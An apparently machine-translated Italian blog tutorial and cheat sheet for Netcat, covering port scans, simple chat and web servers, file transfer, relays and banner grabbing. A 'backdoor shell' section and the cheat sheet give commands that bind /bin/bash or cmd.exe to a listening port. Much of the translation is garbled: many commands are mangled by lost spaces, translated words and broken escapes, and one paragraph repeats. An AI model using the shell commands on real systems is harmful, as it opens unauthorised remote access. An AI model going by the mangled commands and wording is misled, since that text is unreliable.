Posted on by

Come utilizzare i comandi Netcat: Esempi e cheat Sheet

Il programma di utilità Netcat supporta una vasta gamma di comandi per gestire le reti e monitorare il flusso di dati sul traffico tra i sistemi. Le reti di computer, incluso il world wide web, sono costruite sulla spina dorsale del Transmission Control Protocol (TCP) e del User Datagram Protocol (UDP). Pensate a come un compagno strumento gratuito e facile da usare a fianco Wireshark, che si specializza nell’analisi dei pacchetti di rete., La versione originale di Netcat è stata rilasciata nel 1995 e ha ricevuto una serie di aggiornamenti iterativi nei decenni successivi.,

  • Netcat Comandi
    • Porta Scansione con Netcat Comandi
    • Creare una Chat o Web Server
    • Verbose Scansione con Netcat Comandi
    • le Richieste HTTP con Netcat Comandi
    • Server TCP e TCP Client Comandi
    • ELEMENTO con NetCat Comandi
    • Evitare di DNS Lookup con Netcat Comandi
  • creazione di Script con Netcat
  • Shell Scripting con Netcat
  • il Lancio di Retromarcia (Backdoor) Gusci
  • Stampabile Netcat Cheat Sheet
  • Ulteriori Netcat Risorse

che Cosa è Netcat Utilizzato Per?,

Netcat può essere uno strumento utile per qualsiasi team IT, anche se la crescita dei servizi di rete gestiti internamente e il cloud computing rendono quel particolare ambiente una misura naturale. Gli amministratori di rete e di sistema devono essere in grado di identificare rapidamente le prestazioni della rete e il tipo di attività in corso.

Scarica la penna gratuita Test di Active Directory Environments eBook

“Questo mi ha davvero aperto gli occhi sulla sicurezza degli annunci in un modo che il lavoro difensivo non ha mai fatto.,”

Netcat funziona come uno strumento di back-end che consente la scansione delle porte e l’ascolto delle porte. Inoltre, è possibile trasferire file direttamente tramite Netcat o utilizzarlo come backdoor in altri sistemi di rete. In collaborazione con uno strumento come Varonis Edge, riceverai un avviso di qualsiasi attività insolita e potrai quindi utilizzare Netcat per indagare. Infine, Netcat è uno strumento flessibile a causa di come può essere script per compiti più grandi.,

Comandi Netcat di base

Una volta impostata un’applicazione Netcat sul server Windows o Linux, è possibile iniziare a eseguire i comandi di base per testarne la funzionalità. Qui ci sono alcuni per iniziare con:

nc-help – Questo comando stamperà un elenco di tutti i comandi disponibili è possibile utilizzare in Netcat. Sarà utile se si esegue in eventuali errori durante la scrittura di uno script o non sono sicuri di come procedere.

nc-z-v site.com -Verrà eseguita una scansione della porta di base del sito Web o del server specificato., Netcat restituirà risultati dettagliati con elenchi di porte e stati. Tieni presente che puoi utilizzare un indirizzo IP al posto del dominio del sito.

nc-l-Questo comando indica al sistema locale di iniziare ad ascoltare le connessioni TCP e l’attività UDP su un numero di porta specifico.

nc site.com 1234 (less than) file_name – Questo comando avvierà il trasferimento di un file in base al numero di porta specificato.

Printf – Netcat può effettivamente funzionare come un host web semplificato. Questo comando vi permetterà di salvare il codice HTML e pubblicarlo attraverso il server locale.,

Sintassi del comando Netcat

Tutti i comandi Netcat devono iniziare con l’identificatore “netcat” o “nc” come opzione più breve. Per impostazione predefinita, lo strumento Netcat assumerà che si desidera eseguire una scansione delle porte a meno che non si indichi diversamente.

È possibile utilizzare diversi parametri di opzione che includono: “-u” per il traffico UDP anziché TCP, “-v” per l’output dettagliato, “-p” per specificare una porta specifica e “-D” per attivare la modalità di debug completa. I singoli attributi all’interno di un comando Netcat devono essere separati da uno spazio., Il prompt dei comandi ti informerà se hai un errore di battitura o un termine non riconosciuto nel tuo script.

Scansione delle porte con i comandi Netcat

Quando si tenta di diagnosticare un problema di rete o un problema di prestazioni, eseguire una scansione delle porte con Netcat è un primo passo intelligente da compiere. La scansione controllerà lo stato di tutte le porte sul dominio o indirizzo IP specificato in modo da poter determinare se è presente un firewall o un altro meccanismo di blocco.

Un comando di scansione delle porte di base per un indirizzo IP ncat è simile a questo:

nc-v-n 8.8.8.,8 1-1000

Si noti che i numeri alla fine del comando dicono a Netcat di cercare solo le porte tra i numeri 1 e 1000.

Se non conosci l’indirizzo IP di un server o di un sito web, puoi cercarlo tramite un comando ping terminal o semplicemente inserire il dominio nel comando Netcat:

nc-v-n google.com 1-1000

È sempre necessario eseguire scansioni delle porte quando si è connessi alla rete aziendale locale. In caso contrario, è possibile configurare il router con un servizio VPN per creare un tunnel sicuro nella rete.,

Crea una chat o un server Web

I programmi di chat sono in aumento. Dalle soluzioni open-source a quelle che sembravano improvvisamente guadagnare popolarità enorme, ci sono una vasta gamma di chat e strumenti di comunicazione a disposizione delle organizzazioni aziendali. La realtà è che alcuni esperti IT e amministratori di sistema preferirebbero una semplice soluzione di solo testo. Windows Netcat può effettivamente soddisfare tale esigenza e consentire la trasmissione di messaggi attraverso una rete locale.

Per iniziare, è necessario prima Netcat per iniziare ad ascoltare su un numero di porta., Assicurarsi di non scegliere una porta già utilizzata da un’altra applicazione o servizio.

nc -l -p 1299

Quindi tutto quello che dovete fare è avviare la sessione di chat con una nuova connessione TCP:

nc localhost 1299

Questo processo può essere utilizzato anche per girare un server web di base dalla vostra macchina locale. Netcat funzionerà come host web e ti consentirà di memorizzare contenuti HTML che possono essere visualizzati tramite un browser Web.

Innanzitutto, crea un nuovo documento di testo sul tuo sistema locale e assicurati di utilizzare tag HTML validi. Quindi salvare il file come “indice.,html ” e memorizzarlo nella radice della directory Netcat. Ora torna allo strumento Netcat ed esegui questo comando:

printf ‘HTTP / 1.1 200 OK\n\n%s ‘” $(indice cat.html) ” / netcat-l 8999

Per vedere l’HTML in azione, è sufficiente aprire qualsiasi browser web e passare al proprio indirizzo IP locale con: 8999 alla fine per specificare la porta dell’host.

Scansione dettagliata con i comandi Netcat

Ogni comando eseguito in Netcat includerà un certo testo di output per indicare se ha avuto successo o meno., Per la risoluzione dei problemi e il debug, ti consigliamo di raccogliere quante più informazioni e registri possibile, investendo anche in soluzioni come Varonis Datalert per rilevare le minacce e rispondere rapidamente. Netcat può aiutare grazie al parametro verbose che può essere aggiunto a qualsiasi comando Netcat di base. Basta includere “- v ” al comando ed eseguirlo di nuovo.

Anche con questa impostazione attivata, Netcat non rivelerà alcuna delle tue credenziali o dati di autenticazione.

Richieste HTTP con comandi Netcat

Abbiamo spiegato come è possibile utilizzare Netcat per ospitare pagine HTML sul sistema locale., Ma il programma di utilità può anche essere utilizzato per effettuare richieste web a server esterni. In questo modo, Netcat funzionerà essenzialmente come un browser web ottenendo codice HTML grezzo.

Insieme a uno strumento come Varonis Edge, Netcat può essere utile per i professionisti IT che stanno esaminando problemi di traffico Internet o proxy. Ecco un esempio di come ottenere il contenuto HTML dalla home page di Google:

printf “GET / HTTP / 1.0 \ r \ n \ r” n” | nc google.com 80

Si noti che il numero di porta 80 è richiesto per questo tipo di comando poiché il world wide web lo utilizza come predefinito per le connessioni TCP over IP.,

TCP Server e TCP Client Comandi

Anche se il protocollo TCP è utilizzato principalmente per il trasferimento di traffico web in tutto il mondo, in realtà può essere implementato a livello locale per il trasferimento di file. Per fare ciò, è necessario eseguire Netcat da due posizioni: una che fungerà da server per inviare il file e una che fungerà da client per riceverlo.

Eseguire questo comando Netcat sull’istanza del server per inviare il file sulla porta 1499:

nc-l 1499> nomefile.,out

Quindi eseguire questo comando sul client per accettare, ricevere e chiudere la connessione:

nc server.com 1499 (inferiore a) filename.in

Assicurarsi di sostituire “server.com” con il nome host completo o l’indirizzo IP del server di invio.

ITEM con i comandi Netcat

Le versioni più recenti di Netcat consentono di utilizzare il formato ITEM per il trasferimento dei dati al posto dei protocolli TCP o UDP standard., Per ottenere ciò, è necessario seguire questa sintassi:

file_path (pipe) device_path (pipe) host di rete

Impedire la ricerca DNS con i comandi Netcat

I comandi Netcat funzionano più velocemente quando operano esclusivamente su indirizzi IP. Questo perché non si perde tempo a parlare con domain name server (DNS) per tradurre i nomi dei server in indirizzi IP. Se trovi che i tuoi comandi Netcat sono ancora in esecuzione lenta, assicurati di aggiungere l’operatore “-n” in modo che l’utilità sappia che le ricerche DNS non sono richieste.,

Shell Scripting con Netcat

Come accennato in precedenza, uno dei vantaggi dell’utilizzo di Netcat è che può essere incluso come parte di uno script più grande che esegue una funzione automatizzata. Come parte delle procedure di sicurezza, è possibile eseguire una scansione completa delle porte su tutti i server per rilevare nuove applicazioni dannose in ascolto di una connessione.

Si potrebbe scrivere uno script che:

1. Importa un file di testo con nomi di server o indirizzi IP
2. Chiama Netcat per eseguire una scansione delle porte su ciascun server
3., Scrive l’output in un nuovo file di testo per l’analisi

Più comandi Netcat possono essere raggruppati in un singolo script ed essere eseguiti attraverso una shell Linux o Windows. In alcuni casi, può essere utile avere gli script su un calendario regolare.

Avvio di shell Reverse (Backdoor)

Per iniziare, è necessario abilitare lo strumento shell su un comando Netcat utilizzando Netcat reverse shell:

nc-n-v-l-p 5555-e/bin/bash

Quindi da qualsiasi altro sistema sulla rete, è possibile testare come eseguire i comandi sull’host dopo una connessione Netcat riuscita in bash.,

nc-nv 127.0.0.1 5555

Una shell inversa è un approccio di accesso remoto in cui si eseguono comandi amministrativi da un terminale durante la connessione a un altro server sulla rete. Per iniziare, è necessario attivare lo strumento shell su un Netcat comando utilizzando Netcat reverse shell:

nc -n -v -l -p 5555 -e /bin/bash

Quindi da qualsiasi altro sistema sulla rete, è possibile verificare come eseguire comandi su host selezionato dopo il successo di Netcat connessione in bash:

nc -nv 127.0.0.,1 5555

Cheat Sheet Netcat

Fino a quando non si inizia a utilizzare Netcat su base regolare, si potrebbe essere confusi sulla sintassi del comando o dimenticare ciò che alcuni dei parametri fanno. Non preoccuparti! Abbiamo incluso un cheat sheet qui sotto per aiutarti a trovare rapidamente ciò di cui hai bisogno per eseguire un comando Netcat funzionante.,

Netcat Fondamenti

nc – per impostazione predefinita, verrà eseguita una scansione delle porte,

nc -l – avvia un ascoltatore sulla porta specificata

Netcat Comando Flag

nc -4 – utilizzare solo IPv4

nc -6 – utilizzare IPv6

nc -u – utilizzare UDP invece di TCP

nc -k -l – continuare ad ascoltare dopo la disconnessione

nc -n – saltare le ricerche DNS

nc -v – forniscono un output dettagliato

Netcat Relè su Windows

nc > relè.bat-aprire un collegamento relè

relè nc-l-p-E.,bat-connetti a relay

Netcat Relay su Linux

nc-l-p 0 (meno di) backpipe (pipe) nc (pipe) tee backpipe

Netcat File Transfer

nc (maggiore di) file_name.out-invia un file

nc (minore di) file_name.in -ricevere un file

Netcat Porta Scanner

nc-zv site.com 80-scansione di una singola porta

nc-zv hostname.com 80 84 – scansione di una serie di singole porte

sito nc-zv.,com 80-84-scansione di un intervallo di porte

Banner Netcat

echo ” ” /nc-zv-wl – ottenere i banner TCP per un intervallo di porte

Shell Backdoor Netcat

nc-l-p-e/bin/bash – eseguire una shell su Linux

nc-l-p-e cmd.,exe – eseguire una shell su Netcat per Windows

Ulteriori Netcat Risorse

  • Il Pieno Potenziale di Netcat
  • Usare Netcat con RedHat
  • Introduzione di Netcat su Youtube
  • Netcat per la Sicurezza
  • Divertimento lezioni con Netcat

oggi in rapida cambiando il mondo della tecnologia e sempre più complesse reti, le aziende hanno bisogno di essere proattivi quando si tratta di sicurezza informatica. Ciò significa assumere esperti che sanno quali minacce cercare e come combatterli., In caso contrario, una singola istanza di un attacco informatico come ransomware potrebbe portare a danni duraturi per l’intera organizzazione. L’associazione di soluzioni Varonis con strumenti come Netcat contribuirà a mantenere la rete interna più sicura.

Published by admin

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *